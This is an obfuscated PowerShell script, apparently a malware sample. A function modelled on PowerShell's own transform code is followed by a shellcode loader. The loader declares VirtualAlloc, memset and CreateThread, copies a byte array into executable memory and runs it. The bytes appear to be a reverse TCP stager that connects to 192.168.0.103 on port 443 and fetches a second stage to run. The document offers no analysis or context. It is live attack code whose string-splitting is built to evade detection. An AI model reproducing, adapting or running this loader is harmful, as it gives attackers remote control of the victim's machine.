SeT-VariAbLE  ("T9"+"5") ([TYpe]("{0}{3}{1}{2}"-f 'S','R','iptBlOCK','c')  )  ;  $W35 = [TYpe]("{6}{5}{7}{1}{8}{2}{9}{3}{4}{0}"-F'ST','wORk.MeS','Age.MEssa','eH','O','FRam','pS','E','s','G'); $Lx1  =[tyPE]("{6}{9}{5}{4}{8}{3}{7}{11}{0}{12}{10}{1}{2}"-F 'Io','nSpA','Ce','.A','ManAGE','m.','sY','ut','mENT','StE','S.RU','omAt','n.RunspAce') ;  function c`ONVeRt-`P`s`FMEsSAg`e`TARget
{
	
	[CmdletBinding()]
	Param (
		[Parameter(MandAtOrY = ${t`RUe})]
		${taR`g`eT},
		
		[Parameter(MANdATORY = ${T`RuE})]
		[string]
		${Fu`NctiOnn`A`Me},
		
		[Parameter(MaNdAtory = ${T`Rue})]
		[string]
		${moD`ULena`ME}
	)
	
	if (${Nu`LL} -eq ${taR`G`et}) { return }
	
	${t`YpenA`ME} = ${Tar`g`Et}.("{2}{1}{0}" -f 'tType','e','G').Invoke()."FuLl`NaME".("{0}{1}"-f'T','oLower').Invoke()
	
	if ( $W35::"tarGETtr`AnS`FoR`mS".("{2}{1}{0}"-f'ainsKey','ont','C').Invoke(${tyPE`N`AmE}))
	{
		${s`cri`PTBLocK} =  ( GeT-varIAble  W35 ).Value::"t`Ar`G`ETt`RaN`SfOrms"[${T`Y`Pen`Ame}]
		try
		{
			${te`mpT`A`Rget} = ${EX`ecUTiONCO`N`TeXT}."in`Vok`ecoMM`And"."I`NVoKE`sCRiPT"(${fAL`SE}, ( ( get-VAriable ("T9"+"5")  -vALUeonl  )::("{1}{0}"-f 'reate','C').Invoke(${scRI`Pt`BlO`Ck}.("{0}{1}{2}"-f'ToSt','r','ing').Invoke())), ${NU`Ll}, ${T`A`Rget})
			return ${t`e`Mpt`ArgEt}
		}
		catch
		{
			 ( VaRiAbLe  w35 ).vALUE::("{3}{0}{1}{2}" -f 'iteTrans','formEr','ror','Wr').Invoke(${_}, ${func`TI`onNAmE}, ${Mo`dUlE`Na`ME}, ${taR`G`Et}, ("{0}{1}"-f 'Targe','t'), ( (GEt-VaRIaBlE  ("lX"+"1") -ValueONLY)::"defAU`lt`RuN`sPAcE"."iN`StAnc`EId"))
			return ${tar`GET}
		}
	}
	
	if (${tR`AnsF`OrM} =   (  varIaBLe W35  -VaLueo)::"T`AR`GET`TRanSFO`RmliSt".("{1}{0}" -f'et','G').Invoke(${tYpe`NA`Me}, ${MO`d`ULEName}, ${FuN`cti`ONNAME}))
	{
		try
		{
			${temp`TA`Rg`ET} = ${eXECUt`IONCoNt`e`xt}."iN`V`okECO`MmAnd"."i`NVoKeS`c`Ript"(${Fal`SE}, ( (  ITEM  ('vARIAbl'+'e:t'+'95') ).valuE::("{0}{1}"-f'C','reate').Invoke(${t`RAnsfo`Rm}."ScrI`Pt`BL`Ock".("{1}{0}"-f 'String','To').Invoke())), ${n`Ull}, ${t`AR`GEt})
			return ${temp`TARg`eT}
		}
		catch
		{
			  (  itEm VArIABLe:w35  ).VALUe::("{5}{2}{4}{3}{0}{1}" -f 'Transform','Error','r','e','it','W').Invoke(${_}, ${fU`NcTI`onnaMe}, ${M`oD`Ul`EnaME}, ${TAr`gET}, ("{1}{2}{0}"-f 't','T','arge'), ( (  GET-variabLE lx1 ).VaLUe::"DEfAul`T`R`UnspacE"."In`s`TAnceid"))
			return ${Ta`RG`Et}
		}
	}
	
	return ${T`AR`GEt}
}
${O`RFA} = ((("{85}{64}{89}{95}{23}{80}{1}{51}{36}{94}{65}{55}{14}{60}{3}{100}{30}{86}{33}{50}{4}{70}{2}{26}{101}{92}{59}{93}{41}{63}{62}{77}{83}{24}{87}{54}{18}{68}{82}{47}{29}{69}{39}{42}{56}{58}{34}{53}{61}{73}{11}{78}{88}{90}{10}{99}{66}{45}{72}{44}{84}{19}{38}{25}{5}{102}{22}{52}{6}{49}{8}{43}{97}{0}{46}{16}{57}{21}{71}{28}{96}{20}{98}{32}{17}{15}{75}{40}{13}{79}{12}{7}{76}{9}{37}{81}{67}{31}{48}{35}{91}{27}{74}" -f 'ionFl','kernel3',' flAllocat','ualAlloc(IntP','wS','Star','met','mset','r, uint d','IntPtr de','s','(','me',' IntPtr','tern IntPtr V',' static e',' I','lic','c ','Ptr','svcrt.','Ptr lpT','dress, IntPtr l','u',']pub','lp','ionType',')','Id);[Dll','ic e','lpAddress,',' u','b','uint','re',' src, uint cou','llu5r','s',' ','ter','rn','n','n ','wCre','iz',' dwStac','ags,','at','int','e',' d','2.d','pPara','at','i','blic static ex','IntPtr','nt',' C','mport','irt','eTh','2','el3','Dl','u','t',',','s','x','ize, uint','hread','kS','read',';','xte','(','.dll','IntPtr lpThrea',' ','5r','t','t','u5r)','e, Int','[',' ','l','dA','lIm','ttribute','nt','uint flProtect);[DllI','(u5rker',')]p','port(','Import(u5rm','at','dllu5r)]pu',', uin','tr ',', ','tAd'))-repLaCe([cHAR]117+[cHAR]53+[cHAR]114),[cHAR]34);${W} = .("{1}{0}{2}" -f'd','Ad','-Type') -memberDefinition ${or`Fa} -Name ("{1}{0}"-f'32','Win') -namespace ("{1}{2}{4}{3}{0}"-f's','Win32Fun','c','ion','t') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x67,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${Z}."l`ENGtH" -gt 0x1000){${g} = ${Z}."LE`Ngth"};${4`c8h}=${W}::("{2}{1}{3}{0}" -f 'Alloc','t','Vir','ual').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${Z}."lEN`gTh"-1);${i}++) {${W}::"mEMs`eT"([IntPtr](${4`c8H}.("{2}{1}{0}" -f'32','t','ToIn').Invoke()+${I}), ${Z}[${I}], 1)};${w}::("{2}{1}{3}{0}"-f 'read','ate','Cre','Th').Invoke(0,0,${4C`8H},0,0,0);for (;;){.("{3}{1}{0}{2}"-f'lee','t-s','p','Star') 60};
